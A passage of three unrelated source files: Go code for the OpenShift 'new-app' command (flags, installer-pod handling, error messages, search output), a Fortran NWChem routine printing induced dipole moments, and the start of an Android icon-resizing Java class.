				os.Exit(1)
			}
			kcmdutil.CheckErr(err)
		},
	}

	cmd.Flags().BoolVar(&config.AsTestDeployment, "as-test", config.AsTestDeployment, "If true create this application as a test deployment, which validates that the deployment succeeds and then scales down.")
	cmd.Flags().StringSliceVar(&config.SourceRepositories, "code", config.SourceRepositories, "Source code to use to build this application.")
	cmd.Flags().StringVar(&config.ContextDir, "context-dir", "", "Context directory to be used for the build.")
	// --image is the deprecated spelling of --image-stream; both write to the same slice.
	cmd.Flags().StringSliceVarP(&config.ImageStreams, "image", "", config.ImageStreams, "Name of an image stream to use in the app. (deprecated)")
	cmd.Flags().MarkDeprecated("image", "use --image-stream instead")
	cmd.Flags().StringSliceVarP(&config.ImageStreams, "image-stream", "i", config.ImageStreams, "Name of an image stream to use in the app.")
	cmd.Flags().StringSliceVar(&config.DockerImages, "docker-image", config.DockerImages, "Name of a Docker image to include in the app.")
	cmd.Flags().StringSliceVar(&config.Templates, "template", config.Templates, "Name of a stored template to use in the app.")
	cmd.Flags().StringSliceVarP(&config.TemplateFiles, "file", "f", config.TemplateFiles, "Path to a template file to use for the app.")
	cmd.MarkFlagFilename("file", "yaml", "yml", "json")
	cmd.Flags().StringSliceVarP(&config.TemplateParameters, "param", "p", config.TemplateParameters, "Specify a list of key value pairs (e.g., -p FOO=BAR,BAR=FOO) to set/override parameter values in the template.")
	cmd.Flags().StringSliceVar(&config.Groups, "group", config.Groups, "Indicate components that should be grouped together as <comp1>+<comp2>.")
	cmd.Flags().StringSliceVarP(&config.Environment, "env", "e", config.Environment, "Specify key-value pairs of environment variables to set into each container. This doesn't apply to objects created from a template, use parameters instead.")
	cmd.Flags().StringVar(&config.Name, "name", "", "Set name to use for generated application artifacts")
	cmd.Flags().StringVar(&config.Strategy, "strategy", "", "Specify the build strategy to use if you don't want to detect (docker|source).")
	cmd.Flags().StringP("labels", "l", "", "Label to set in all resources for this application.")
	cmd.Flags().BoolVar(&config.InsecureRegistry, "insecure-registry", false, "If true, indicates that the referenced Docker images are on insecure registries and should bypass certificate checking")
	cmd.Flags().BoolVarP(&config.AsList, "list", "L", false, "List all local templates and image streams that can be used to create.")
	cmd.Flags().BoolVarP(&config.AsSearch, "search", "S", false, "Search all templates, image streams, and Docker images that match the arguments provided.")
	cmd.Flags().BoolVar(&config.AllowMissingImages, "allow-missing-images", false, "If true, indicates that referenced Docker images that cannot be found locally or in a registry should still be used.")
	cmd.Flags().BoolVar(&config.AllowMissingImageStreamTags, "allow-missing-imagestream-tags", false, "If true, indicates that image stream tags that don't exist should still be used.")
	cmd.Flags().BoolVar(&config.AllowSecretUse, "grant-install-rights", false, "If true, a component that requires access to your account may use your token to install software into your project. Only grant images you trust the right to run with your token.")
	cmd.Flags().BoolVar(&config.SkipGeneration, "no-install", false, "Do not attempt to run images that describe themselves as being installable")

	options.Action.BindForOutput(cmd.Flags())
	cmd.Flags().String("output-version", "", "The preferred API versions of the output objects")

	return cmd
}

// Complete sets any default behavior for the command
func (o *NewAppOptions) Complete(commandName string, f *clientcmd.Factory, c *cobra.Command, args []string, out io.Writer) error {
	o.Out = out
	o.ErrOut = c.OutOrStderr()
	o.Output = kcmdutil.GetFlagString(c, "output")
	// Only output="" should print descriptions of intermediate steps. Everything
	// else should print only some specific output (json, yaml, go-template, ...)
	if len(o.Output) == 0 {
		o.Config.Out = o.Out
	} else {
		o.Config.Out = ioutil.Discard
	}
	o.Config.ErrOut = o.ErrOut

	o.Action.Out, o.Action.ErrOut = o.Out, o.ErrOut
	o.Action.Bulk.Mapper = clientcmd.ResourceMapper(f)
	o.Action.Bulk.Op = configcmd.Create
	// Retry is used to support previous versions of the API server that will
	// consider the presence of an unknown trigger type to be an error.
	o.Action.Bulk.Retry = retryBuildConfig

	o.Config.DryRun = o.Action.DryRun
	o.CommandPath = c.CommandPath()
	o.CommandName = commandName
	mapper, _ := f.Object(false)
	o.PrintObject = cmdutil.VersionedPrintObject(f.PrintObject, c, mapper, out)
	o.LogsForObject = f.LogsForObject
	if err := CompleteAppConfig(o.Config, f, c, args); err != nil {
		return err
	}
	if err := setAppConfigLabels(c, o.Config); err != nil {
		return err
	}
	return nil
}

// Run contains all the necessary functionality for the OpenShift cli new-app command
func (o *NewAppOptions) Run() error {
	config := o.Config
	out := o.Out

	// Search/list mode: query only, never create objects.
	if config.Querying() {
		result, err := config.RunQuery()
		if err != nil {
			return handleRunError(err, o.CommandName, o.CommandPath)
		}

		if o.Action.ShouldPrint() {
			return o.PrintObject(result.List)
		}

		return printHumanReadableQueryResult(result, out, o.CommandName)
	}

	checkGitInstalled(out)

	result, err := config.Run()
	if err := handleRunError(err, o.CommandName, o.CommandPath); err != nil {
		return err
	}

	// if the user has set the "app" label explicitly on their objects in the template,
	// we should not return a failure when we can't set it ourselves.
	ignoreLabelFailure := false
	if len(config.Labels) == 0 && len(result.Name) > 0 {
		config.Labels = map[string]string{"app": result.Name}
		ignoreLabelFailure = true
	}
	if err := setLabels(config.Labels, result, ignoreLabelFailure); err != nil {
		return err
	}
	if err := setAnnotations(map[string]string{newcmd.GeneratedByNamespace: newcmd.GeneratedByNewApp}, result); err != nil {
		return err
	}

	if o.Action.ShouldPrint() {
		return o.PrintObject(result.List)
	}

	if result.GeneratedJobs {
		o.Action.Compact()
	}

	if errs := o.Action.WithMessage(configcmd.CreateMessage(config.Labels), "created").Run(result.List, result.Namespace); len(errs) > 0 {
		return cmdutil.ErrExit
	}

	if !o.Action.Verbose() || o.Action.DryRun {
		return nil
	}

	// Print per-object follow-up hints and collect generated installer pods.
	hasMissingRepo := false
	installing := []*kapi.Pod{}
	indent := o.Action.DefaultIndent()
	for _, item := range result.List.Items {
		switch t := item.(type) {
		case *kapi.Pod:
			if t.Annotations[newcmd.GeneratedForJob] == "true" {
				installing = append(installing, t)
			}
		case *buildapi.BuildConfig:
			triggered := false
			for _, trigger := range t.Spec.Triggers {
				switch trigger.Type {
				case buildapi.ImageChangeBuildTriggerType, buildapi.ConfigChangeBuildTriggerType:
					triggered = true
					// NOTE(review): this break exits the switch, not the loop;
					// the loop keeps scanning harmlessly.
					break
				}
			}
			if triggered {
				fmt.Fprintf(out, "%[1]sBuild scheduled, use '%[3]s logs -f bc/%[2]s' to track its progress.\n", indent, t.Name, o.CommandName)
			} else {
				fmt.Fprintf(out, "%[1]sUse '%[3]s start-build %[2]s' to start a build.\n", indent, t.Name, o.CommandName)
			}
		case *imageapi.ImageStream:
			if len(t.Status.DockerImageRepository) == 0 {
				// Warn about a missing registry at most once.
				if hasMissingRepo {
					continue
				}
				hasMissingRepo = true
				fmt.Fprintf(out, "%sWARNING: No Docker registry has been configured with the server. Automatic builds and deployments may not function.\n", indent)
			}
		}
	}

	switch {
	case len(installing) == 1:
		// Single installer pod: follow its logs to completion.
		jobInput := installing[0].Annotations[newcmd.GeneratedForJobFor]
		return followInstallation(config, jobInput, installing[0], o.LogsForObject)
	case len(installing) > 1:
		for i := range installing {
			fmt.Fprintf(out, "%sTrack installation of %s with '%s logs %s'.\n", indent, installing[i].Name, o.CommandName, installing[i].Name)
		}
	case len(result.List.Items) > 0:
		fmt.Fprintf(out, "%sRun '%s %s' to view your app.\n", indent, o.CommandName, StatusRecommendedName)
	}
	return nil
}

// LogsForObjectFunc resolves an object (and log options) to a log request.
type LogsForObjectFunc func(object, options runtime.Object) (*restclient.Request, error)

// followInstallation waits for the installer pod to leave Pending, streams
// its logs, and then waits for the pod to reach a terminal phase.
func followInstallation(config *newcmd.AppConfig, input string, pod *kapi.Pod, logsForObjectFn LogsForObjectFunc) error {
	fmt.Fprintf(config.Out, "--> Installing ...\n")

	// we cannot retrieve logs until the pod is out of pending
	// TODO: move this to the server side
	podClient := config.KubeClient.Pods(pod.Namespace)
	if err := wait.PollImmediate(500*time.Millisecond, 60*time.Second, installationStarted(podClient, pod.Name, config.KubeClient.Secrets(pod.Namespace))); err != nil {
		return err
	}

	opts := &kcmd.LogsOptions{
		Namespace:   pod.Namespace,
		ResourceArg: pod.Name,
		Options: &kapi.PodLogOptions{
			Follow:    true,
			Container: pod.Spec.Containers[0].Name,
		},
		Mapper:        config.Mapper,
		Typer:         config.Typer,
		ClientMapper:  config.ClientMapper,
		LogsForObject: logsForObjectFn,
		Out:           config.Out,
	}
	_, logErr := opts.RunLogs()

	// status of the pod may take tens of seconds to propagate
	if err := wait.PollImmediate(500*time.Millisecond, 30*time.Second, installationComplete(podClient, pod.Name, config.Out)); err != nil {
		if err == wait.ErrWaitTimeout {
			if logErr != nil {
				// output the log error if one occurred
				err = logErr
			} else {
				err = fmt.Errorf("installation may not have completed, see logs for %q for more information", pod.Name)
			}
		}
		return err
	}

	return nil
}

// installationStarted reports true once the installer pod has left the
// Pending phase; as a side effect it deletes the generated install secret
// (named like the pod) once the pod is running.
func installationStarted(c kclient.PodInterface, name string, s kclient.SecretsInterface) wait.ConditionFunc {
	return func() (bool, error) {
		pod, err := c.Get(name)
		if err != nil {
			return false, err
		}
		if pod.Status.Phase == kapi.PodPending {
			return false, nil
		}
		// delete a secret named the same as the pod if it exists
		if secret, err := s.Get(name); err == nil {
			if secret.Annotations[newcmd.GeneratedForJob] == "true" &&
				secret.Annotations[newcmd.GeneratedForJobFor] == pod.Annotations[newcmd.GeneratedForJobFor] {
				if err := s.Delete(name); err != nil {
					glog.V(4).Infof("Failed to delete install secret %s: %v", name, err)
				}
			}
		}
		return true, nil
	}
}

// installationComplete reports true once the installer pod has succeeded
// (deleting the pod) or failed (returning an error). A deleted pod is a
// hard error because success can no longer be determined.
func installationComplete(c kclient.PodInterface, name string, out io.Writer) wait.ConditionFunc {
	return func() (bool, error) {
		pod, err := c.Get(name)
		if err != nil {
			if kapierrors.IsNotFound(err) {
				return false, fmt.Errorf("installation pod was deleted; unable to determine whether it completed successfully")
			}
			// Transient lookup failure: keep polling.
			return false, nil
		}
		switch pod.Status.Phase {
		case kapi.PodSucceeded:
			fmt.Fprintf(out, "--> Success\n")
			if err := c.Delete(name, nil); err != nil {
				glog.V(4).Infof("Failed to delete install pod %s: %v", name, err)
			}
			return true, nil
		case kapi.PodFailed:
			return true, fmt.Errorf("installation of %q did not complete successfully", name)
		default:
			return false, nil
		}
	}
}

// setAppConfigLabels parses the --labels flag (if set) into config.Labels.
func setAppConfigLabels(c *cobra.Command, config *newcmd.AppConfig) error {
	labelStr := kcmdutil.GetFlagString(c, "labels")
	if len(labelStr) != 0 {
		var err error
		config.Labels, err = ctl.ParseLabels(labelStr)
		if err != nil {
			return err
		}
	}
	return nil
}

// getDockerClient returns a client capable of communicating with the local
// docker daemon. If an error occurs (such as no local daemon being available),
// it will return nil.
func getDockerClient() (*docker.Client, error) {
	dockerClient, _, err := dockerutil.NewHelper().GetClient()
	if err == nil {
		// A constructed client is only useful if the daemon answers a ping.
		if err = dockerClient.Ping(); err != nil {
			glog.V(4).Infof("Docker client did not respond to a ping: %v", err)
			return nil, err
		}
		return dockerClient, nil
	}
	glog.V(2).Infof("No local Docker daemon detected: %v", err)
	return nil, err
}

// CompleteAppConfig fills in clients, mappers, namespace, and arguments on
// the AppConfig and validates mutually-exclusive flag combinations.
func CompleteAppConfig(config *newcmd.AppConfig, f *clientcmd.Factory, c *cobra.Command, args []string) error {
	mapper, typer := f.Object(false)
	if config.Mapper == nil {
		config.Mapper = mapper
	}
	if config.Typer == nil {
		config.Typer = typer
	}
	if config.ClientMapper == nil {
		config.ClientMapper = resource.ClientMapperFunc(f.ClientForMapping)
	}

	namespace, _, err := f.DefaultNamespace()
	if err != nil {
		return err
	}

	osclient, kclient, err := f.Clients()
	if err != nil {
		return err
	}
	config.KubeClient = kclient
	// A missing local Docker daemon is tolerated: dockerClient may be nil.
	dockerClient, _ := getDockerClient()
	config.SetOpenShiftClient(osclient, namespace, dockerClient)

	if config.AllowSecretUse {
		cfg, err := f.OpenShiftClientConfig.ClientConfig()
		if err != nil {
			return err
		}
		config.SecretAccessor = newConfigSecretRetriever(cfg)
	}

	unknown := config.AddArguments(args)
	if len(unknown) != 0 {
		return kcmdutil.UsageError(c, "Did not recognize the following arguments: %v", unknown)
	}

	if config.AllowMissingImages && config.AsSearch {
		return kcmdutil.UsageError(c, "--allow-missing-images and --search are mutually exclusive.")
	}

	if len(config.SourceImage) != 0 && len(config.SourceImagePath) == 0 {
		return kcmdutil.UsageError(c, "--source-image-path must be specified when --source-image is specified.")
	}
	if len(config.SourceImage) == 0 && len(config.SourceImagePath) != 0 {
		return kcmdutil.UsageError(c, "--source-image must be specified when --source-image-path is specified.")
	}
	return nil
}

// setAnnotations applies the given annotations to every generated object;
// the first failure aborts.
func setAnnotations(annotations map[string]string, result *newcmd.AppResult) error {
	for _, object := range result.List.Items {
		err := util.AddObjectAnnotations(object, annotations)
		if err != nil {
			return err
		}
	}
	return nil
}

// setLabels applies the given labels to every generated object; failures are
// swallowed when ignoreFailure is true (user already labeled the objects).
func setLabels(labels map[string]string, result *newcmd.AppResult, ignoreFailure bool) error {
	for _, object := range result.List.Items {
		err := util.AddObjectLabels(object, labels)
		if err != nil && !ignoreFailure {
			return err
		}
	}
	return nil
}

// isInvalidTriggerError returns true if the given error is
// a validation error that contains 'invalid trigger type' in its
// error message. This error is returned from older servers that
// consider the presence of unknown trigger types to be an error.
func isInvalidTriggerError(err error) bool {
	if !kapierrors.IsInvalid(err) {
		return false
	}
	statusErr, ok := err.(*kapierrors.StatusError)
	if !ok {
		return false
	}
	return strings.Contains(statusErr.Status().Message, "invalid trigger type")
}

// retryBuildConfig determines if the given error is caused by an invalid trigger
// error on a BuildConfig. If that is the case, it will remove all triggers with a
// type that is not in the whitelist for an older server.
func retryBuildConfig(info *resource.Info, err error) runtime.Object {
	triggerTypeWhiteList := map[buildapi.BuildTriggerType]struct{}{
		buildapi.GitHubWebHookBuildTriggerType:  {},
		buildapi.GenericWebHookBuildTriggerType: {},
		buildapi.ImageChangeBuildTriggerType:    {},
	}
	if info.Mapping.GroupVersionKind.GroupKind() == buildapi.Kind("BuildConfig") && isInvalidTriggerError(err) {
		bc, ok := info.Object.(*buildapi.BuildConfig)
		if !ok {
			return nil
		}
		triggers := []buildapi.BuildTriggerPolicy{}
		for _, t := range bc.Spec.Triggers {
			if _, inList := triggerTypeWhiteList[t.Type]; inList {
				triggers = append(triggers, t)
			}
		}
		bc.Spec.Triggers = triggers
		return bc
	}
	// nil signals "do not retry".
	return nil
}

// handleRunError groups the (possibly aggregated) errors from a run, renders
// each group with its suggestion, and returns a single combined error.
func handleRunError(err error, commandName, commandPath string) error {
	if err == nil {
		return nil
	}
	errs := []error{err}
	if agg, ok := err.(errors.Aggregate); ok {
		errs = agg.Errors()
	}
	groups := errorGroups{}
	for _, err := range errs {
		transformError(err, commandName, commandPath, groups)
	}
	buf := &bytes.Buffer{}
	for _, group := range groups {
		fmt.Fprint(buf, kcmdutil.MultipleErrors("error: ", group.errs))
		if len(group.suggestion) > 0 {
			fmt.Fprintln(buf)
		}
		fmt.Fprint(buf, group.suggestion)
	}
	// NOTE(review): non-constant format string passed to Errorf; any '%' in
	// the buffer would be misinterpreted — consider Errorf("%s", ...).
	return fmt.Errorf(buf.String())
}

// errorGroup collects related errors and one shared user-facing suggestion.
type errorGroup struct {
	errs       []error
	suggestion string
}

// errorGroups maps a group key to its accumulated errors and suggestion.
type errorGroups map[string]errorGroup

// Add appends err (and any extra errs) to the named group, replacing the
// group's suggestion with the one supplied.
func (g errorGroups) Add(group string, suggestion string, err error, errs ...error) {
	all := g[group]
	all.errs = append(all.errs, errs...)
	all.errs = append(all.errs, err)
	all.suggestion = suggestion
	g[group] = all
}

// transformError translates known error types from the generator into
// grouped, user-friendly messages with actionable suggestions; anything
// unrecognized is added verbatim to the default group.
func transformError(err error, commandName, commandPath string, groups errorGroups) {
	switch t := err.(type) {
	case newcmd.ErrRequiresExplicitAccess:
		if t.Input.Token != nil && t.Input.Token.ServiceAccount {
			groups.Add(
				"explicit-access-installer",
				heredoc.Doc(`
					WARNING: This will allow the pod to create and manage resources within your namespace -
					ensure you trust the image with those permissions before you continue.

					You can see more information about the image by adding the --dry-run flag.
					If you trust the provided image, include the flag --grant-install-rights.`,
				),
				fmt.Errorf("installing %q requires an 'installer' service account with project editor access", t.Match.Value),
			)
		} else {
			groups.Add(
				"explicit-access-you",
				heredoc.Doc(`
					WARNING: This will allow the pod to act as you across the entire cluster - ensure you
					trust the image with those permissions before you continue.

					You can see more information about the image by adding the --dry-run flag.
					If you trust the provided image, include the flag --grant-install-rights.`,
				),
				fmt.Errorf("installing %q requires that you grant the image access to run with your credentials", t.Match.Value),
			)
		}
		return
	case newapp.ErrNoMatch:
		groups.Add(
			"no-matches",
			heredoc.Docf(`
				The '%[1]s' command will match arguments to the following types:

				  1. Images tagged into image streams in the current project or the 'openshift' project
				     - if you don't specify a tag, we'll add ':latest'
				  2. Images in the Docker Hub, on remote registries, or on the local Docker engine
				  3. Templates in the current project or the 'openshift' project
				  4. Git repository URLs or local paths that point to Git repositories

				--allow-missing-images can be used to point to an image that does not exist yet.

				See '%[1]s -h' for examples.`, commandPath,
			),
			t,
			t.Errs...,
		)
		return
	case newapp.ErrMultipleMatches:
		buf := &bytes.Buffer{}
		for i, match := range t.Matches {
			// If we have more than 5 matches, stop output and recommend searching
			// after the fifth
			if i >= 5 {
				groups.Add(
					"multiple-matches",
					heredoc.Docf(`
						The argument %[1]q could apply to the following Docker images, OpenShift image streams, or templates:

						%[2]sTo view a full list of matches, use '%[3]s new-app -S %[1]s'`, t.Value, buf.String(), commandName,
					),
					t,
					t.Errs...,
				)
				return
			}
			fmt.Fprintf(buf, "* %s\n", match.Description)
			fmt.Fprintf(buf, "  Use %[1]s to specify this image or template\n\n", match.Argument)
		}
		groups.Add(
			"multiple-matches",
			heredoc.Docf(`
				The argument %[1]q could apply to the following Docker images, OpenShift image streams, or templates:

				%[2]s`, t.Value, buf.String(),
			),
			t,
			t.Errs...,
		)
		return
	case newapp.ErrPartialMatch:
		buf := &bytes.Buffer{}
		fmt.Fprintf(buf, "* %s\n", t.Match.Description)
		fmt.Fprintf(buf, "  Use %[1]s to specify this image or template\n\n", t.Match.Argument)
		groups.Add(
			"partial-match",
			heredoc.Docf(`
				The argument %[1]q only partially matched the following Docker image, OpenShift image stream, or template:

				%[2]s`, t.Value, buf.String(),
			),
			t,
			t.Errs...,
		)
		return
	case newapp.ErrNoTagsFound:
		buf := &bytes.Buffer{}
		fmt.Fprintf(buf, "  Use --allow-missing-imagestream-tags to use this image stream\n\n")
		groups.Add(
			"no-tags",
			heredoc.Docf(`
				The image stream %[1]q exists, but it has no tags.

				%[2]s`, t.Match.Name, buf.String(),
			),
			t,
			t.Errs...,
		)
		return
	}
	switch err {
	case errNoTokenAvailable:
		// TODO: improve by allowing token generation
		groups.Add("", "", fmt.Errorf("to install components you must be logged in with an OAuth token (instead of only a certificate)"))
	case newcmd.ErrNoInputs:
		// TODO: suggest things to the user
		groups.Add("", "", usageError(commandPath, newAppNoInput, commandName))
	default:
		groups.Add("", "", err)
	}
}

// usageError formats a message and appends a pointer to the command's help.
func usageError(commandPath, format string, args ...interface{}) error {
	msg := fmt.Sprintf(format, args...)
	return fmt.Errorf("%s\nSee '%s -h' for help and examples.", msg, commandPath)
}

// printHumanReadableQueryResult renders search results grouped into
// templates, image streams, and Docker images, each sorted by score.
func printHumanReadableQueryResult(r *newcmd.QueryResult, out io.Writer, commandName string) error {
	if len(r.Matches) == 0 {
		return fmt.Errorf("no matches found")
	}

	templates := newapp.ComponentMatches{}
	imageStreams := newapp.ComponentMatches{}
	dockerImages := newapp.ComponentMatches{}

	for _, match := range r.Matches {
		switch {
		case match.IsTemplate():
			templates = append(templates, match)
		case match.IsImage() && match.ImageStream != nil:
			imageStreams = append(imageStreams, match)
		case match.IsImage() && match.Image != nil:
			dockerImages = append(dockerImages, match)
		}
	}

	sort.Sort(newapp.ScoredComponentMatches(templates))
	sort.Sort(newapp.ScoredComponentMatches(imageStreams))
	sort.Sort(newapp.ScoredComponentMatches(dockerImages))

	if len(templates) > 0 {
		fmt.Fprintf(out, "Templates (%s new-app --template=<template>)\n", commandName)
		fmt.Fprintln(out, "-----")
		for _, match := range templates {
			template := match.Template
			description := template.ObjectMeta.Annotations["description"]

			fmt.Fprintln(out, template.Name)
			fmt.Fprintf(out, "  Project: %v\n", template.Namespace)
			if len(description) > 0 {
				fmt.Fprintf(out, "  %v\n", description)
			}
		}
		fmt.Fprintln(out)
	}

	if len(imageStreams) > 0 {
		fmt.Fprintf(out, "Image streams (%s new-app --image-stream=<image-stream> [--code=<source>])\n", commandName)
		fmt.Fprintln(out, "-----")
		for _, match := range imageStreams {
			imageStream := match.ImageStream
			description := imageStream.ObjectMeta.Annotations["description"]
			tags := "<none>"
			if len(imageStream.Status.Tags) > 0 {
				// sets.NewString gives a deterministic, sorted tag list.
				set := sets.NewString()
				for tag := range imageStream.Status.Tags {
					set.Insert(tag)
				}
				tags = strings.Join(set.List(), ", ")
			}

			fmt.Fprintln(out, imageStream.Name)
			fmt.Fprintf(out, "  Project: %v\n", imageStream.Namespace)
			if len(imageStream.Spec.DockerImageRepository) > 0 {
				fmt.Fprintf(out, "  Tracks:  %v\n", imageStream.Spec.DockerImageRepository)
			}
			fmt.Fprintf(out, "  Tags:    %v\n", tags)
			if len(description) > 0 {
				fmt.Fprintf(out, "  %v\n", description)
			}
		}
		fmt.Fprintln(out)
	}

	if len(dockerImages) > 0 {
		fmt.Fprintf(out, "Docker images (%s new-app --docker-image=<docker-image> [--code=<source>])\n", commandName)
		fmt.Fprintln(out, "-----")
		for _, match := range dockerImages {
			image := match.Image

			name, tag, ok := imageapi.SplitImageStreamTag(match.Name)
			if !ok {
				name = match.Name
				tag = match.ImageTag
			}

			fmt.Fprintln(out, name)
			fmt.Fprintf(out, "  Registry: %v\n", match.Meta["registry"])
			fmt.Fprintf(out, "  Tags:     %v\n", tag)

			if len(image.Comment) > 0 {
				fmt.Fprintf(out, "  %v\n", image.Comment)
			}
		}
		fmt.Fprintln(out)
	}

	return nil
}

// configSecretRetriever exposes the bearer token and CA cert from a client
// config to installable components.
type configSecretRetriever struct {
	config *restclient.Config
}

// newConfigSecretRetriever wraps a rest config as a SecretAccessor.
func newConfigSecretRetriever(config *restclient.Config) newapp.SecretAccessor {
	return &configSecretRetriever{config}
}

// errNoTokenAvailable is returned when the client is authenticated with a
// certificate only and no bearer token can be provided to installers.
var errNoTokenAvailable = fmt.Errorf("you are not logged in with a token - unable to provide a secret to the installable component")

// Token returns the client's bearer token or errNoTokenAvailable.
func (r *configSecretRetriever) Token() (string, error) {
	if len(r.config.BearerToken) > 0 {
		return r.config.BearerToken, nil
	}
	return "", errNoTokenAvailable
}

// CACert returns the CA certificate from inline data or from the configured
// file; an empty string (no error) means no CA is configured.
func (r *configSecretRetriever) CACert() (string, error) {
	if len(r.config.CAData) > 0 {
		return string(r.config.CAData), nil
	}
	if len(r.config.CAFile) > 0 {
		data, err := ioutil.ReadFile(r.config.CAFile)
		if err != nil {
			return "", fmt.Errorf("unable to read CA cert from config %s: %v", r.config.CAFile, err)
		}
		return string(data), nil
	}
	return "", nil
}

// checkGitInstalled warns (without failing) when git is not on the PATH,
// since source-based builds require it.
func checkGitInstalled(w io.Writer) {
	if !git.IsGitInstalled() {
		fmt.Fprintf(w, "warning: Cannot find git. Ensure that it is installed and in your path. Git is required to work with git repositories.\n")
	}
}
{ "pile_set_name": "Github" }
      subroutine dimqm_printDipole(rtdb, muind, icmplx, lpprint)
c
c     Print the total induced dipole moment of the DIM system, summed
c     over all DIM atoms, in atomic units and Debye.
c
c     rtdb    [in] runtime database handle
c     muind   [in] per-atom induced dipoles, (3, nDIM, icmplx)
c     icmplx  [in] 1 = real dipoles only, 2 = real + imaginary parts
c     lpprint [in] .true. = decorated block output, .false. = terse output
c
      implicit none
#include "errquit.fh"
#include "inp.fh"
#include "rtdb.fh"
#include "stdio.fh"
#include "nwc_const.fh"
#include "mafdecls.fh"
#include "global.fh"
#include "dimqm_constants.fh"
#include "dimqm.fh"
c     Input variables
      integer rtdb
      integer icmplx
      double precision muind(3,nDIM,icmplx)
c      double precision qind(nDIM, icmplx)
      logical lpprint
c
c     Local variables
      double precision diptot(3, icmplx)
      character*60 dd
      character*60 d
c     Only the master rank prints; all other ranks return immediately.
      if(ga_nodeid().ne.0) return
c     Sum the per-atom dipoles over the atom dimension (DIM=2).
      diptot = SUM(muind, DIM = 2)
      dd =
     $ '============================================================='
      d =
     $ '-------------------------------------------------------------'
c     BLAS matrix-matrix multiply to add in charge term
      if(lpprint) then
c       Decorated output block (separator lines around the values).
        write(luout,'(/1x,a)') dd
        write(luout,'(1x,a)')
     $   'Total induced dipole moment in DIM system :'
        write(luout,'(1x,a)') d
        if(icmplx == 1) then
          write(luout,'(2x,a,2x,3f16.8)') 'A.U.:', diptot(:,1)
          write(luout,'(2x,a,1x,3f16.8)') 'Debye:', diptot(:,1)*AU2DEBYE
        else
c         Complex response: print real and imaginary parts separately.
          write(luout,'(1x,a)') 'A.U.'
          write(luout,'(1x,a,3f16.8)') 'Real: ', diptot(:,1)
          write(luout,'(1x,a,3f16.8)') 'Imag: ', diptot(:,2)
          write(luout,'(1x,a)') d
          write(luout,'(1x,a)') 'Debye'
          write(luout,'(1x,a,3f16.8)') 'Real: ', diptot(:,1)*AU2DEBYE
          write(luout,'(1x,a,3f16.8)') 'Imag: ', diptot(:,2)*AU2DEBYE
        end if
        write(luout,'(1x,a/)') dd
      else
c       Terse output (no separators, A.U. only for the real-only case).
        write(luout,'(1x,a)')
     $   'Total induced dipole moment in DIM system :'
        if(icmplx == 1) then
          write(luout,'(3f14.8)') diptot(:,1)
        else
          write (luout,'(1x,a,3f16.8)') 'Real: ', diptot(:,1)
          write (luout,'(1x,a,3f16.8)') 'Imag: ', diptot(:,2)
        end if
      end if
      end subroutine dimqm_printDipole
{ "pile_set_name": "Github" }
package com.oasisfeng.android.ui;

import android.content.res.Resources;
import android.graphics.Bitmap;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.graphics.PaintFlagsDrawFilter;
import android.graphics.PixelFormat;
import android.graphics.Rect;
import android.graphics.drawable.BitmapDrawable;
import android.graphics.drawable.Drawable;
import android.graphics.drawable.PaintDrawable;

import androidx.annotation.UiThread;

/**
 * Utility class to resize icons to match default icon size.
 *
 * Derived from {@link android.app.LauncherActivity.IconResizer}
 */
public class IconResizer {
	// Code is borrowed from com.android.launcher.Utilities.

	// Target thumbnail dimensions in pixels.
	private final int mIconWidth, mIconHeight;
	// Scratch objects reused across calls -- this shared mutable state is why
	// the class must only be used from a single (UI) thread.
	private final Rect mOldBounds = new Rect();
	private final Canvas mCanvas = new Canvas();

	/** Uses the system default application icon size (android.R.dimen.app_icon_size). */
	public IconResizer() {
		this((int) Resources.getSystem().getDimension(android.R.dimen.app_icon_size));
	}

	/** @param size target width and height of produced thumbnails, in pixels */
	public IconResizer(final int size) {
		// Dithering + bitmap filtering for smoother scaled drawing.
		mCanvas.setDrawFilter(new PaintFlagsDrawFilter(Paint.DITHER_FLAG, Paint.FILTER_BITMAP_FLAG));
		mIconWidth = mIconHeight = size;
	}

	/**
	 * Returns a Drawable representing the thumbnail of the specified Drawable.
	 * The size of the thumbnail is defined by the dimension
	 * android.R.dimen.launcher_application_icon_size.
	 *
	 * This method is not thread-safe and should be invoked on the UI thread only.
	 *
	 * @param icon The icon to get a thumbnail of.
	 *
	 * @return A thumbnail for the specified icon or the icon itself if the
	 *         thumbnail could not be created.
	 */
	@UiThread public Drawable createIconThumbnail(Drawable icon) {
		int width = mIconWidth;
		int height = mIconHeight;

		final int iconWidth = icon.getIntrinsicWidth();
		final int iconHeight = icon.getIntrinsicHeight();

		if (icon instanceof PaintDrawable) {
			// PaintDrawable has no intrinsic size; force it to the target size.
			final PaintDrawable painter = (PaintDrawable) icon;
			painter.setIntrinsicWidth(width);
			painter.setIntrinsicHeight(height);
		}

		if (width > 0 && height > 0) {
			if (width < iconWidth || height < iconHeight) {
				// Icon is larger than the target: scale down, preserving the
				// aspect ratio, then center it inside a target-sized bitmap.
				final float ratio = (float) iconWidth / iconHeight;

				if (iconWidth > iconHeight) {
					height = (int) (width / ratio);
				} else if (iconHeight > iconWidth) {
					width = (int) (height * ratio);
				}

				// RGB_565 suffices for fully opaque icons; otherwise keep alpha.
				final Bitmap.Config c = icon.getOpacity() != PixelFormat.OPAQUE ?
						Bitmap.Config.ARGB_8888 : Bitmap.Config.RGB_565;
				final Bitmap thumb = Bitmap.createBitmap(mIconWidth, mIconHeight, c);
				final Canvas canvas = mCanvas;
				canvas.setBitmap(thumb);
				// Copy the old bounds to restore them later
				// If we were to do oldBounds = icon.getBounds(),
				// the call to setBounds() that follows would
				// change the same instance and we would lose the
				// old bounds
				mOldBounds.set(icon.getBounds());
				final int x = (mIconWidth - width) / 2;
				final int y = (mIconHeight - height) / 2;
				icon.setBounds(x, y, x + width, y + height);
				icon.draw(canvas);
				icon.setBounds(mOldBounds);
				icon = new BitmapDrawable(Resources.getSystem(), thumb);
				// Detach the bitmap so the shared canvas holds no reference.
				canvas.setBitmap(null);
			} else if (iconWidth < width && iconHeight < height) {
				// Icon is smaller than the target: draw it unscaled, centered
				// inside a target-sized transparent bitmap (no enlargement).
				final Bitmap.Config c = Bitmap.Config.ARGB_8888;
				final Bitmap thumb = Bitmap.createBitmap(mIconWidth, mIconHeight, c);
				final Canvas canvas = mCanvas;
				canvas.setBitmap(thumb);
				mOldBounds.set(icon.getBounds());
				final int x = (width - iconWidth) / 2;
				final int y = (height - iconHeight) / 2;
				icon.setBounds(x, y, x + iconWidth, y + iconHeight);
				icon.draw(canvas);
				icon.setBounds(mOldBounds);
